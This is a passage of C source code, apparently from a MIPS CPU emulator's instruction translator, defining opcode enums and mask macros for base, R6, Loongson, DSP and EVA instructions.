OPC_DMULTU = 0x1D | OPC_SPECIAL, OPC_DDIV = 0x1E | OPC_SPECIAL, OPC_DDIVU = 0x1F | OPC_SPECIAL, /* 2 registers arithmetic / logic */ OPC_ADD = 0x20 | OPC_SPECIAL, OPC_ADDU = 0x21 | OPC_SPECIAL, OPC_SUB = 0x22 | OPC_SPECIAL, OPC_SUBU = 0x23 | OPC_SPECIAL, OPC_AND = 0x24 | OPC_SPECIAL, OPC_OR = 0x25 | OPC_SPECIAL, OPC_XOR = 0x26 | OPC_SPECIAL, OPC_NOR = 0x27 | OPC_SPECIAL, OPC_SLT = 0x2A | OPC_SPECIAL, OPC_SLTU = 0x2B | OPC_SPECIAL, OPC_DADD = 0x2C | OPC_SPECIAL, OPC_DADDU = 0x2D | OPC_SPECIAL, OPC_DSUB = 0x2E | OPC_SPECIAL, OPC_DSUBU = 0x2F | OPC_SPECIAL, /* Jumps */ OPC_JR = 0x08 | OPC_SPECIAL, /* Also JR.HB */ OPC_JALR = 0x09 | OPC_SPECIAL, /* Also JALR.HB */ /* 
Traps */ OPC_TGE = 0x30 | OPC_SPECIAL, OPC_TGEU = 0x31 | OPC_SPECIAL, OPC_TLT = 0x32 | OPC_SPECIAL, OPC_TLTU = 0x33 | OPC_SPECIAL, OPC_TEQ = 0x34 | OPC_SPECIAL, OPC_TNE = 0x36 | OPC_SPECIAL, /* HI / LO registers load & stores */ OPC_MFHI = 0x10 | OPC_SPECIAL, OPC_MTHI = 0x11 | OPC_SPECIAL, OPC_MFLO = 0x12 | OPC_SPECIAL, OPC_MTLO = 0x13 | OPC_SPECIAL, /* Conditional moves */ OPC_MOVZ = 0x0A | OPC_SPECIAL, OPC_MOVN = 0x0B | OPC_SPECIAL, OPC_SELEQZ = 0x35 | OPC_SPECIAL, OPC_SELNEZ = 0x37 | OPC_SPECIAL, OPC_MOVCI = 0x01 | OPC_SPECIAL, /* Special */ OPC_PMON = 0x05 | OPC_SPECIAL, /* unofficial */ OPC_SYSCALL = 0x0C | OPC_SPECIAL, OPC_BREAK = 0x0D | OPC_SPECIAL, OPC_SPIM = 0x0E | OPC_SPECIAL, /* unofficial */ OPC_SYNC = 0x0F | OPC_SPECIAL, OPC_SPECIAL28_RESERVED = 0x28 | OPC_SPECIAL, OPC_SPECIAL29_RESERVED = 0x29 | OPC_SPECIAL, OPC_SPECIAL39_RESERVED = 0x39 | OPC_SPECIAL, OPC_SPECIAL3D_RESERVED = 0x3D | OPC_SPECIAL, }; /* * R6 Multiply and Divide instructions have the same opcode * and function field as legacy OPC_MULT[U]/OPC_DIV[U] */ #define MASK_R6_MULDIV(op) (MASK_SPECIAL(op) | (op & (0x7ff))) enum { R6_OPC_MUL = OPC_MULT | (2 << 6), R6_OPC_MUH = OPC_MULT | (3 << 6), R6_OPC_MULU = OPC_MULTU | (2 << 6), R6_OPC_MUHU = OPC_MULTU | (3 << 6), R6_OPC_DIV = OPC_DIV | (2 << 6), R6_OPC_MOD = OPC_DIV | (3 << 6), R6_OPC_DIVU = OPC_DIVU | (2 << 6), R6_OPC_MODU = OPC_DIVU | (3 << 6), R6_OPC_DMUL = OPC_DMULT | (2 << 6), R6_OPC_DMUH = OPC_DMULT | (3 << 6), R6_OPC_DMULU = OPC_DMULTU | (2 << 6), R6_OPC_DMUHU = OPC_DMULTU | (3 << 6), R6_OPC_DDIV = OPC_DDIV | (2 << 6), R6_OPC_DMOD = OPC_DDIV | (3 << 6), R6_OPC_DDIVU = OPC_DDIVU | (2 << 6), R6_OPC_DMODU = OPC_DDIVU | (3 << 6), R6_OPC_CLZ = 0x10 | OPC_SPECIAL, R6_OPC_CLO = 0x11 | OPC_SPECIAL, R6_OPC_DCLZ = 0x12 | OPC_SPECIAL, R6_OPC_DCLO = 0x13 | OPC_SPECIAL, R6_OPC_SDBBP = 0x0e | OPC_SPECIAL, OPC_LSA = 0x05 | OPC_SPECIAL, OPC_DLSA = 0x15 | OPC_SPECIAL, }; /* Multiplication variants of the vr54xx. 
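They share the MULT/MULTU major opcode; bits 10..6 of the function field select the variant, hence the extra (0x1F << 6) term in the mask below.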
*/ #define MASK_MUL_VR54XX(op) (MASK_SPECIAL(op) | (op & (0x1F << 6))) enum { OPC_VR54XX_MULS = (0x03 << 6) | OPC_MULT, OPC_VR54XX_MULSU = (0x03 << 6) | OPC_MULTU, OPC_VR54XX_MACC = (0x05 << 6) | OPC_MULT, OPC_VR54XX_MACCU = (0x05 << 6) | OPC_MULTU, OPC_VR54XX_MSAC = (0x07 << 6) | OPC_MULT, OPC_VR54XX_MSACU = (0x07 << 6) | OPC_MULTU, OPC_VR54XX_MULHI = (0x09 << 6) | OPC_MULT, OPC_VR54XX_MULHIU = (0x09 << 6) | OPC_MULTU, OPC_VR54XX_MULSHI = (0x0B << 6) | OPC_MULT, OPC_VR54XX_MULSHIU = (0x0B << 6) | OPC_MULTU, OPC_VR54XX_MACCHI = (0x0D << 6) | OPC_MULT, OPC_VR54XX_MACCHIU = (0x0D << 6) | OPC_MULTU, OPC_VR54XX_MSACHI = (0x0F << 6) | OPC_MULT, OPC_VR54XX_MSACHIU = (0x0F << 6) | OPC_MULTU, }; /* REGIMM (rt field) opcodes */ #define MASK_REGIMM(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 16))) enum { OPC_BLTZ = (0x00 << 16) | OPC_REGIMM, OPC_BLTZL = (0x02 << 16) | OPC_REGIMM, OPC_BGEZ = (0x01 << 16) | OPC_REGIMM, OPC_BGEZL = (0x03 << 16) | OPC_REGIMM, OPC_BLTZAL = (0x10 << 16) | OPC_REGIMM, OPC_BLTZALL = (0x12 << 16) | OPC_REGIMM, OPC_BGEZAL = (0x11 << 16) | OPC_REGIMM, OPC_BGEZALL = (0x13 << 16) | OPC_REGIMM, OPC_TGEI = (0x08 << 16) | OPC_REGIMM, OPC_TGEIU = (0x09 << 16) | OPC_REGIMM, OPC_TLTI = (0x0A << 16) | OPC_REGIMM, OPC_TLTIU = (0x0B << 16) | OPC_REGIMM, OPC_TEQI = (0x0C << 16) | OPC_REGIMM, OPC_TNEI = (0x0E << 16) | OPC_REGIMM, OPC_SIGRIE = (0x17 << 16) | OPC_REGIMM, OPC_SYNCI = (0x1F << 16) | OPC_REGIMM, OPC_DAHI = (0x06 << 16) | OPC_REGIMM, OPC_DATI = (0x1e << 16) | OPC_REGIMM, }; /* Special2 opcodes */ #define MASK_SPECIAL2(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { /* Multiply & xxx operations */ OPC_MADD = 0x00 | OPC_SPECIAL2, OPC_MADDU = 0x01 | OPC_SPECIAL2, OPC_MUL = 0x02 | OPC_SPECIAL2, OPC_MSUB = 0x04 | OPC_SPECIAL2, OPC_MSUBU = 0x05 | OPC_SPECIAL2, /* Loongson 2F */ OPC_MULT_G_2F = 0x10 | OPC_SPECIAL2, OPC_DMULT_G_2F = 0x11 | OPC_SPECIAL2, OPC_MULTU_G_2F = 0x12 | OPC_SPECIAL2, OPC_DMULTU_G_2F = 0x13 | OPC_SPECIAL2, OPC_DIV_G_2F = 0x14 | OPC_SPECIAL2, OPC_DDIV_G_2F = 0x15 | OPC_SPECIAL2, OPC_DIVU_G_2F = 0x16 | OPC_SPECIAL2, OPC_DDIVU_G_2F = 0x17 | OPC_SPECIAL2, OPC_MOD_G_2F = 0x1c | OPC_SPECIAL2, OPC_DMOD_G_2F = 0x1d | OPC_SPECIAL2, OPC_MODU_G_2F = 0x1e | OPC_SPECIAL2, OPC_DMODU_G_2F = 0x1f | OPC_SPECIAL2, /* Misc */ OPC_CLZ = 0x20 | OPC_SPECIAL2, OPC_CLO = 0x21 | OPC_SPECIAL2, OPC_DCLZ = 0x24 | OPC_SPECIAL2, OPC_DCLO = 0x25 | OPC_SPECIAL2, /* Special */ OPC_SDBBP = 0x3F | OPC_SPECIAL2, }; /* Special3 opcodes */ #define MASK_SPECIAL3(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { OPC_EXT = 0x00 | OPC_SPECIAL3, OPC_DEXTM = 0x01 | OPC_SPECIAL3, OPC_DEXTU = 0x02 | OPC_SPECIAL3, OPC_DEXT = 0x03 | OPC_SPECIAL3, OPC_INS = 0x04 | OPC_SPECIAL3, OPC_DINSM = 0x05 | OPC_SPECIAL3, OPC_DINSU = 0x06 | OPC_SPECIAL3, OPC_DINS = 0x07 | OPC_SPECIAL3, OPC_FORK = 0x08 | OPC_SPECIAL3, OPC_YIELD = 0x09 | OPC_SPECIAL3, OPC_BSHFL = 0x20 | OPC_SPECIAL3, OPC_DBSHFL = 0x24 | OPC_SPECIAL3, OPC_RDHWR = 0x3B | OPC_SPECIAL3, OPC_GINV = 0x3D | OPC_SPECIAL3, /* Loongson 2E */ OPC_MULT_G_2E = 0x18 | OPC_SPECIAL3, OPC_MULTU_G_2E = 0x19 | OPC_SPECIAL3, OPC_DIV_G_2E = 0x1A | OPC_SPECIAL3, OPC_DIVU_G_2E = 0x1B | OPC_SPECIAL3, OPC_DMULT_G_2E = 0x1C | OPC_SPECIAL3, OPC_DMULTU_G_2E = 0x1D | OPC_SPECIAL3, OPC_DDIV_G_2E = 0x1E | OPC_SPECIAL3, OPC_DDIVU_G_2E = 0x1F | OPC_SPECIAL3, OPC_MOD_G_2E = 0x22 | OPC_SPECIAL3, OPC_MODU_G_2E = 0x23 | OPC_SPECIAL3, OPC_DMOD_G_2E = 0x26 | OPC_SPECIAL3, OPC_DMODU_G_2E = 0x27 | OPC_SPECIAL3, /* MIPS DSP Load */ OPC_LX_DSP = 0x0A | OPC_SPECIAL3, /* MIPS DSP Arithmetic */ OPC_ADDU_QB_DSP = 
0x10 | OPC_SPECIAL3, OPC_ADDU_OB_DSP = 0x14 | OPC_SPECIAL3, OPC_ABSQ_S_PH_DSP = 0x12 | OPC_SPECIAL3, OPC_ABSQ_S_QH_DSP = 0x16 | OPC_SPECIAL3, /* OPC_ADDUH_QB_DSP is same as OPC_MULT_G_2E. */ /* OPC_ADDUH_QB_DSP = 0x18 | OPC_SPECIAL3, */ OPC_CMPU_EQ_QB_DSP = 0x11 | OPC_SPECIAL3, OPC_CMPU_EQ_OB_DSP = 0x15 | OPC_SPECIAL3, /* MIPS DSP GPR-Based Shift Sub-class */ OPC_SHLL_QB_DSP = 0x13 | OPC_SPECIAL3, OPC_SHLL_OB_DSP = 0x17 | OPC_SPECIAL3, /* MIPS DSP Multiply Sub-class insns */ /* OPC_MUL_PH_DSP is same as OPC_ADDUH_QB_DSP. */ /* OPC_MUL_PH_DSP = 0x18 | OPC_SPECIAL3, */ OPC_DPA_W_PH_DSP = 0x30 | OPC_SPECIAL3, OPC_DPAQ_W_QH_DSP = 0x34 | OPC_SPECIAL3, /* DSP Bit/Manipulation Sub-class */ OPC_INSV_DSP = 0x0C | OPC_SPECIAL3, OPC_DINSV_DSP = 0x0D | OPC_SPECIAL3, /* MIPS DSP Append Sub-class */ OPC_APPEND_DSP = 0x31 | OPC_SPECIAL3, OPC_DAPPEND_DSP = 0x35 | OPC_SPECIAL3, /* MIPS DSP Accumulator and DSPControl Access Sub-class */ OPC_EXTR_W_DSP = 0x38 | OPC_SPECIAL3, OPC_DEXTR_W_DSP = 0x3C | OPC_SPECIAL3, /* EVA */ OPC_LWLE = 0x19 | OPC_SPECIAL3, OPC_LWRE = 0x1A | OPC_SPECIAL3, OPC_CACHEE = 0x1B | OPC_SPECIAL3, OPC_SBE = 0x1C | OPC_SPECIAL3, OPC_SHE = 0x1D | OPC_SPECIAL3, OPC_SCE = 0x1E | OPC_SPECIAL3, OPC_SWE = 0x1F | OPC_SPECIAL3, OPC_SWLE = 0x21 | OPC_SPECIAL3, OPC_SWRE = 0x22 | OPC_SPECIAL3, OPC_PREFE = 0x23 | OPC_SPECIAL3, OPC_LBUE = 0x28 | OPC_SPECIAL3, OPC_LHUE = 0x29 | OPC_SPECIAL3, OPC_LBE = 0x2C | OPC_SPECIAL3, OPC_LHE = 0x2D | OPC_SPECIAL3, OPC_LLE = 0x2E | OPC_SPECIAL3, OPC_LWE = 0x2F | OPC_SPECIAL3, /* R6 */ R6_OPC_PREF = 0x35 | OPC_SPECIAL3, R6_OPC_CACHE = 0x25 | OPC_SPECIAL3, R6_OPC_LL = 0x36 | OPC_SPECIAL3, R6_OPC_SC = 0x26 | OPC_SPECIAL3, R6_OPC_LLD = 0x37 | OPC_SPECIAL3, R6_OPC_SCD = 0x27 | OPC_SPECIAL3, }; /* BSHFL opcodes */ #define MASK_BSHFL(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { OPC_WSBH = (0x02 << 6) | OPC_BSHFL, OPC_SEB = (0x10 << 6) | OPC_BSHFL, OPC_SEH = (0x18 << 6) | OPC_BSHFL, OPC_ALIGN = (0x08 << 6) | OPC_BSHFL, /* 010.bp (010.00 to 010.11) */ OPC_ALIGN_1 = (0x09 << 6) | OPC_BSHFL, OPC_ALIGN_2 = (0x0A << 6) | OPC_BSHFL, OPC_ALIGN_3 = (0x0B << 6) | OPC_BSHFL, OPC_BITSWAP = (0x00 << 6) | OPC_BSHFL /* 00000 */ }; /* DBSHFL opcodes */ #define MASK_DBSHFL(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { OPC_DSBH = (0x02 << 6) | OPC_DBSHFL, OPC_DSHD = (0x05 << 6) | OPC_DBSHFL, OPC_DALIGN = (0x08 << 6) | OPC_DBSHFL, /* 01.bp (01.000 to 01.111) */ OPC_DALIGN_1 = (0x09 << 6) | OPC_DBSHFL, OPC_DALIGN_2 = (0x0A << 6) | OPC_DBSHFL, OPC_DALIGN_3 = (0x0B << 6) | OPC_DBSHFL, OPC_DALIGN_4 = (0x0C << 6) | OPC_DBSHFL, OPC_DALIGN_5 = (0x0D << 6) | OPC_DBSHFL, OPC_DALIGN_6 = (0x0E << 6) | OPC_DBSHFL, OPC_DALIGN_7 = (0x0F << 6) | OPC_DBSHFL, OPC_DBITSWAP = (0x00 << 6) | OPC_DBSHFL, /* 00000 */ }; /* MIPS DSP REGIMM opcodes */ enum { OPC_BPOSGE32 = (0x1C << 16) | OPC_REGIMM, OPC_BPOSGE64 = (0x1D << 16) | OPC_REGIMM, }; #define MASK_LX(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) /* MIPS DSP Load */ enum { OPC_LBUX = (0x06 << 6) | OPC_LX_DSP, OPC_LHX = (0x04 << 6) | OPC_LX_DSP, OPC_LWX = (0x00 << 6) | OPC_LX_DSP, OPC_LDX = (0x08 << 6) | OPC_LX_DSP, }; #define MASK_ADDU_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_ADDQ_PH = (0x0A << 6) | OPC_ADDU_QB_DSP, OPC_ADDQ_S_PH = (0x0E << 6) | OPC_ADDU_QB_DSP, OPC_ADDQ_S_W = (0x16 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_QB = (0x00 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_S_QB = (0x04 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_PH = (0x08 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_S_PH = (0x0C << 6) | OPC_ADDU_QB_DSP, 
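/*
 * Decoding one of these DSP opcodes is a stepwise refinement; for ADDQ.PH,
 * for instance, MASK_OP_MAJOR() selects OPC_SPECIAL3, MASK_SPECIAL3()
 * (function field 0x10) selects OPC_ADDU_QB_DSP, and MASK_ADDU_QB()
 * (bits 10..6 == 0x0A) finally selects OPC_ADDQ_PH above.
 */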
OPC_SUBQ_PH = (0x0B << 6) | OPC_ADDU_QB_DSP, OPC_SUBQ_S_PH = (0x0F << 6) | OPC_ADDU_QB_DSP, OPC_SUBQ_S_W = (0x17 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_QB = (0x01 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_S_QB = (0x05 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_PH = (0x09 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_S_PH = (0x0D << 6) | OPC_ADDU_QB_DSP, OPC_ADDSC = (0x10 << 6) | OPC_ADDU_QB_DSP, OPC_ADDWC = (0x11 << 6) | OPC_ADDU_QB_DSP, OPC_MODSUB = (0x12 << 6) | OPC_ADDU_QB_DSP, OPC_RADDU_W_QB = (0x14 << 6) | OPC_ADDU_QB_DSP, /* MIPS DSP Multiply Sub-class insns */ OPC_MULEU_S_PH_QBL = (0x06 << 6) | OPC_ADDU_QB_DSP, OPC_MULEU_S_PH_QBR = (0x07 << 6) | OPC_ADDU_QB_DSP, OPC_MULQ_RS_PH = (0x1F << 6) | OPC_ADDU_QB_DSP, OPC_MULEQ_S_W_PHL = (0x1C << 6) | OPC_ADDU_QB_DSP, OPC_MULEQ_S_W_PHR = (0x1D << 6) | OPC_ADDU_QB_DSP, OPC_MULQ_S_PH = (0x1E << 6) | OPC_ADDU_QB_DSP, }; #define OPC_ADDUH_QB_DSP OPC_MULT_G_2E #define MASK_ADDUH_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_ADDUH_QB = (0x00 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDUH_R_QB = (0x02 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_PH = (0x08 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_R_PH = (0x0A << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_W = (0x10 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_R_W = (0x12 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBUH_QB = (0x01 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBUH_R_QB = (0x03 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_PH = (0x09 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_R_PH = (0x0B << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_W = (0x11 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_R_W = (0x13 << 6) | OPC_ADDUH_QB_DSP, /* MIPS DSP Multiply Sub-class insns */ OPC_MUL_PH = (0x0C << 6) | OPC_ADDUH_QB_DSP, OPC_MUL_S_PH = (0x0E << 6) | OPC_ADDUH_QB_DSP, OPC_MULQ_S_W = (0x16 << 6) | OPC_ADDUH_QB_DSP, OPC_MULQ_RS_W = (0x17 << 6) | OPC_ADDUH_QB_DSP, }; #define MASK_ABSQ_S_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_ABSQ_S_QB = (0x01 << 6) | OPC_ABSQ_S_PH_DSP, OPC_ABSQ_S_PH = (0x09 << 6) | OPC_ABSQ_S_PH_DSP, OPC_ABSQ_S_W = (0x11 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQ_W_PHL = (0x0C << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQ_W_PHR = (0x0D << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBL = (0x04 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBR = (0x05 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBLA = (0x06 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBRA = (0x07 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBL = (0x1C << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBR = (0x1D << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBLA = (0x1E << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBRA = (0x1F << 6) | OPC_ABSQ_S_PH_DSP, /* DSP Bit/Manipulation Sub-class */ OPC_BITREV = (0x1B << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPL_QB = (0x02 << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPLV_QB = (0x03 << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPL_PH = (0x0A << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPLV_PH = (0x0B << 6) | OPC_ABSQ_S_PH_DSP, }; #define MASK_CMPU_EQ_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_PRECR_QB_PH = (0x0D << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECRQ_QB_PH = (0x0C << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECR_SRA_PH_W = (0x1E << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECR_SRA_R_PH_W = (0x1F << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECRQ_PH_W = (0x14 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECRQ_RS_PH_W = (0x15 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECRQU_S_QB_PH = (0x0F << 6) | OPC_CMPU_EQ_QB_DSP, /* DSP Compare-Pick Sub-class */ OPC_CMPU_EQ_QB = (0x00 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPU_LT_QB = (0x01 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPU_LE_QB = (0x02 << 6) | OPC_CMPU_EQ_QB_DSP, 
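/*
 * Naming note: the CMPU.xx.QB comparisons above and the CMP.xx.PH ones
 * below record their per-element results in the DSPControl condition bits,
 * while the CMPGU/CMPGDU variants below deliver the result mask to a GPR
 * (CMPGDU updates DSPControl as well), following the MIPS DSP ASE manuals.
 */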
OPC_CMPGU_EQ_QB = (0x04 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGU_LT_QB = (0x05 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGU_LE_QB = (0x06 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGDU_EQ_QB = (0x18 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGDU_LT_QB = (0x19 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGDU_LE_QB = (0x1A << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMP_EQ_PH = (0x08 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMP_LT_PH = (0x09 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMP_LE_PH = (0x0A << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PICK_QB = (0x03 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PICK_PH = (0x0B << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PACKRL_PH = (0x0E << 6) | OPC_CMPU_EQ_QB_DSP, }; #define MASK_SHLL_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP GPR-Based Shift Sub-class */ OPC_SHLL_QB = (0x00 << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_QB = (0x02 << 6) | OPC_SHLL_QB_DSP, OPC_SHLL_PH = (0x08 << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_PH = (0x0A << 6) | OPC_SHLL_QB_DSP, OPC_SHLL_S_PH = (0x0C << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_S_PH = (0x0E << 6) | OPC_SHLL_QB_DSP, OPC_SHLL_S_W = (0x14 << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_S_W = (0x16 << 6) | OPC_SHLL_QB_DSP, OPC_SHRL_QB = (0x01 << 6) | OPC_SHLL_QB_DSP, OPC_SHRLV_QB = (0x03 << 6) | OPC_SHLL_QB_DSP, OPC_SHRL_PH = (0x19 << 6) | OPC_SHLL_QB_DSP, OPC_SHRLV_PH = (0x1B << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_QB = (0x04 << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_R_QB = (0x05 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_QB = (0x06 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_R_QB = (0x07 << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_PH = (0x09 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_PH = (0x0B << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_R_PH = (0x0D << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_R_PH = (0x0F << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_R_W = (0x15 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_R_W = (0x17 << 6) | OPC_SHLL_QB_DSP, }; #define MASK_DPA_W_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Multiply Sub-class insns */ OPC_DPAU_H_QBL = (0x03 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAU_H_QBR = (0x07 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSU_H_QBL = (0x0B << 6) | OPC_DPA_W_PH_DSP, OPC_DPSU_H_QBR = (0x0F << 6) | OPC_DPA_W_PH_DSP, OPC_DPA_W_PH = (0x00 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAX_W_PH = (0x08 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQ_S_W_PH = (0x04 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQX_S_W_PH = (0x18 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQX_SA_W_PH = (0x1A << 6) | OPC_DPA_W_PH_DSP, OPC_DPS_W_PH = (0x01 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSX_W_PH = (0x09 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQ_S_W_PH = (0x05 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQX_S_W_PH = (0x19 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQX_SA_W_PH = (0x1B << 6) | OPC_DPA_W_PH_DSP, OPC_MULSAQ_S_W_PH = (0x06 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQ_SA_L_W = (0x0C << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQ_SA_L_W = (0x0D << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_S_W_PHL = (0x14 << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_S_W_PHR = (0x16 << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_SA_W_PHL = (0x10 << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_SA_W_PHR = (0x12 << 6) | OPC_DPA_W_PH_DSP, OPC_MULSA_W_PH = (0x02 << 6) | OPC_DPA_W_PH_DSP, }; #define MASK_INSV(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Bit/Manipulation Sub-class */ OPC_INSV = (0x00 << 6) | OPC_INSV_DSP, }; #define MASK_APPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Append Sub-class */ OPC_APPEND = (0x00 << 6) | OPC_APPEND_DSP, OPC_PREPEND = (0x01 << 6) | OPC_APPEND_DSP, OPC_BALIGN = (0x10 << 6) | OPC_APPEND_DSP, }; #define MASK_EXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Accumulator and DSPControl Access Sub-class */ OPC_EXTR_W = (0x00 << 6) | OPC_EXTR_W_DSP, OPC_EXTR_R_W = (0x04 << 6) | 
OPC_EXTR_W_DSP, OPC_EXTR_RS_W = (0x06 << 6) | OPC_EXTR_W_DSP, OPC_EXTR_S_H = (0x0E << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_S_H = (0x0F << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_W = (0x01 << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_R_W = (0x05 << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_RS_W = (0x07 << 6) | OPC_EXTR_W_DSP, OPC_EXTP = (0x02 << 6) | OPC_EXTR_W_DSP, OPC_EXTPV = (0x03 << 6) | OPC_EXTR_W_DSP, OPC_EXTPDP = (0x0A << 6) | OPC_EXTR_W_DSP, OPC_EXTPDPV = (0x0B << 6) | OPC_EXTR_W_DSP, OPC_SHILO = (0x1A << 6) | OPC_EXTR_W_DSP, OPC_SHILOV = (0x1B << 6) | OPC_EXTR_W_DSP, OPC_MTHLIP = (0x1F << 6) | OPC_EXTR_W_DSP, OPC_WRDSP = (0x13 << 6) | OPC_EXTR_W_DSP, OPC_RDDSP = (0x12 << 6) | OPC_EXTR_W_DSP, }; #define MASK_ABSQ_S_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_PRECEQ_L_PWL = (0x14 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_L_PWR = (0x15 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHL = (0x0C << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHR = (0x0D << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHLA = (0x0E << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHRA = (0x0F << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBL = (0x04 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBR = (0x05 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBLA = (0x06 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBRA = (0x07 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBL = (0x1C << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBR = (0x1D << 6) | 